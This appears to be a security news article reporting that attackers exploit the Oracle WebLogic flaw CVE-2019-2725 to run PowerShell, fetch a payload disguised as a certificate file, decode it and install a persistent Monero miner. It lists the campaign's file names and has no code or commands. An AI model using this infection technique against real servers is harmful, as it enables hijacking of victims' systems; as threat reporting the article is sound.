CVE-2019-2725 Oracle WebLogic Server Flaw Leads To Monero Miner Infections
NEWS

CVE-2019-2725 Oracle WebLogic Server Flaw Leads To Monero Miner Infections

Rate this post

The CVE-2019-2725 vulnerability which is exhibited in the Oracle WebLogic Server application was abused by hackers leading to Monero miner infections. Several security reports indicate that criminal groups are taking advantage of the bug and are set onto infecting as many computer users as possible with cryptocurrency miners.




Oracle WebLogic Server Flaw and Its CVE-2019-2725 Bug Are Used To Infect Hosts With Monero Miners

The Oracle WebLogic Server as one of the most widely used enterprise solutions has been found to be impacted with a dangerous flaw. It is being tracked in the CVE-2019-2725 advisory which shows how the server can be hacked by malicious users. Using the fault the remote attackers can start a PowerShell command on the server which will trigger a payload download of a certificate file to the host. The certification utility will then decode the contents of the file which will lead to an uncompressed file. In the current attack the final payload is a Monero miner.

During this particular campaign the following list of files have been deployed onto the victim computers:

  • Sysupdate.exe — This is the main Monero miner file
  • Config.json — This is the accompanying configuration file
  • Networkservce.exe — This is another module which is probably being used for the distribution of the payloads.
  • Update.ps1 — This file contains the PowerShell script which is run in memory.
  • Sysguard.exe #— This is the watchdog that monitors the activity of the Monero miner.
  • Clean.bat — This is the clean-up utility.
Related:
An active malware campaign which is using emails in European languages distributes RTF files that carry the CVE-2017-11882 exploit.
CVE-2017-11882 Exploited in Email Attacks Against European Users

The defining characteristic of this campaign is that the obfuscation technique is done via the security certificate files. The cryptocurrency miner code will be installed as a persistent threat thereby making it very difficult to remove. As always the presence of such malicious code will start a sequence of tasks that will place a heavy toll on the performance and stability of the system. Whenever one of them is reported as complete the criminals will receive income in the form of cryptocurrency that will be directly transferred to their wallets. Oracle have patched the vulnerability and are urging customers to update their installations as soon as possible.

Martin Beltov

Martin graduated with a degree in Publishing from Sofia University. As a cyber security enthusiast he enjoys writing about the latest threats and mechanisms of intrusion.

More Posts - Website

Follow Me:
TwitterGoogle Plus

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...